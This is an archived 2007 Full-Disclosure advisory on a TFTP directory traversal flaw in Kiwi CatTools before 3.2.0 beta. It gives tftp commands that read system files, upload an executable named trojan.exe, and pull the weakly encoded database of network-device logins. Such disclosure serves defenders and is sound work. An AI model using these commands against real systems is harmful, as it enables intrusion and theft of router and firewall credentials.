Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
[Full-disclosure] TFTP directory traversal in Kiwi CatTools
From: Nicob (nicobnicob.net)
Date: Thu Feb 08 2007 - 16:28:56 CST
TFTP directory traversal in Kiwi CatTools
Application : Kiwi CatTools prior to 3.2.0 beta
Release Date : 8 February 2007
Author : Nicob <nicob at nicob.net>
"Kiwi CatTools is a freeware application that provides automated device
configuration management on routers, switches and firewalls."
A built-in TFTP server exists and a "encrypted device database" contains
IP addresses, logins and passwords for each configured device.
TFTP directory traversal :
tftp -i 10.11.12.13 GET a//..//..//..//..//..//boot.ini
tftp -i 10.11.12.13 PUT foo.exe a//..//trojan.exe
Note : the device database is only protected by a reversible encoding
and can be remotely accessed with "GET a//..//..//kiwidb-cattools.kdb".
Upgrade to version 3.2.0 beta or newer.
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/